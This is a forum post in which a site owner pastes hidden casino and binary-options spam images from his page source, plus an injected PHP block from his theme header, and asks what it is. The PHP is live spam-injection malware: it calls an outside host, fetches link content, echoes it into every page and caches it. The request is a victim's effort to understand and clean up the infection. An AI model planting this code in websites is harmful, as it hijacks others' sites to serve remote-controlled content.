Mike9666

Hello again,

Here is the view-source:
<!– #header –>
<div class=”clear”></div><img style=”position:absolute; z-index: -9999999;” src=”http://i.imgur.com/4D3zYcv.jpg&#8221; alt=”winner casino”><img style=”position:absolute; z-index: -9999999;” src=”http://i.imgur.com/4XxB1tR.jpg&#8221; alt=”http://www.nederlandstalige-casinos.nl/”&gt;<img style=”position:absolute; z-index: -9999999;” src=”http://i.imgur.com/40CN9R2.jpg&#8221; alt=”www.online-casino-bulgaria.com”><img style=”position:absolute; z-index: -9999999;” src=”http://i.imgur.com/sY6MGyr.jpg&#8221; alt=”opzioni binarie”><img style=”position:absolute; z-index: -9999999;” src=”http://i.imgur.com/BVdO8Rm.jpg&#8221; alt=”option binaire”>
<div class=”subheader” id=”subheader” ><div class=”inner subheader_teaser”><div class=”subtitle”><h1><span>Boulevard Veendam.</span></h1></div></div></div> <!– #subheader –>

just did examine the header again and there was a line inserted as follows:

<!– #header –>
<div class=”clear”></div><?php
$h = $_SERVER[‘HTTP_HOST’]; $u = trim($_SERVER[‘REQUEST_URI’]);
$cd = dirname(__FILE__) . ‘/.cache’;
$cf = $cd . ‘/’ . md5($h . ‘##’ . $u);
$s = ‘1.granitebb.com’;
if (file_exists($cf) and filemtime($cf) > time() – 3600)
echo file_get_contents($cf);
else
{
$ini1 = @ini_set(‘allow_url_fopen’, 1); $ini2 = @ini_set(‘default_socket_timeout’, 3);
$p = ‘/links.php?u=’ . urlencode($u) . ‘&h=’ . urlencode($h);
$c = ”;
if ($fp = @fsockopen($s, 80, $errno, $errstr, 3)) {
@fputs($fp, “GET {$p} HTTP/1.0\r\nHost: $s\r\n\r\n”);
while (! feof($fp))
$c .= @fread($fp, 8192);
fclose($fp);
$c = end(explode(“\r\n\r\n”, $c));
echo $c;
if (strlen($c) and (is_dir($cd) or @mkdir($cd))) {
@file_put_contents($cf, $c);
}
}
@ini_set(‘allow_url_fopen’, $ini1); @ini_set(‘default_socket_timeout’, $ini2);
}
?>

I have deleted the webaddress in the following line:
$s = ‘1.granitebb.com’;

and now its gone.

Can anyone tell me what this is?

Thanks Mike.